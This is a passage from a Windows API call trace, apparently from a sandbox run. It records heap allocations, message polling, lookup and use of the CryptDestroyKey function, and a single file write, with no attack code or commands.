out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0149.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0149.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0149.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0149.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0149.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0149.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0149.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0149.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0149.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0149.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0149.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0149.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0149.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0149.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf8) returned 0x2eabd28 [0149.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0149.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0149.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0149.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0149.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0149.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0149.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0149.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0149.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0149.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0149.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0149.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf8) returned 0x2ec1a28 [0149.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eabd28 | out: hHeap=0x970000) returned 1 [0149.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0149.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0149.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0149.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0149.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0149.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0149.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0149.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0149.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0149.500] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0149.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0149.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0149.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0149.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0149.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0149.501] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0149.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0149.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0149.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0149.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.501] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0149.501] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.861] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.863] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f29d10*, nNumberOfBytesToWrite=0x15cf8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f29d10*, lpNumberOfBytesWritten=0x8cf5e4*=0x15cf8, lpOverlapped=0x0) returned 1 [0149.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.874] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.874] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0149.874] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0149.874] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0149.874] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0149.874] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50950, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0149.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0149.875] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0149.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0149.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0149.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0149.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0149.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0149.875] CryptDestroyKey (hKey=0xa87710) returned 1 [0149.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0149.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0149.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0149.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0149.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0149.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0149.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0149.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0149.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0149.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0149.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0149.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0149.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0149.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0149.877] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0149.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0149.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0149.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0149.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0149.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0149.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0149.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0149.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0149.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0149.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0149.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0149.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0149.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0149.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0149.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.883] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0149.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0149.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0149.883] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0149.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0149.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0149.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0149.883] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0149.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0149.884] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0149.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0149.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0149.884] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0149.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0149.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0149.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0149.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0149.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0149.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0149.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0149.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0149.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0149.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0149.885] HeapFree (in: hHeap=0x970000, 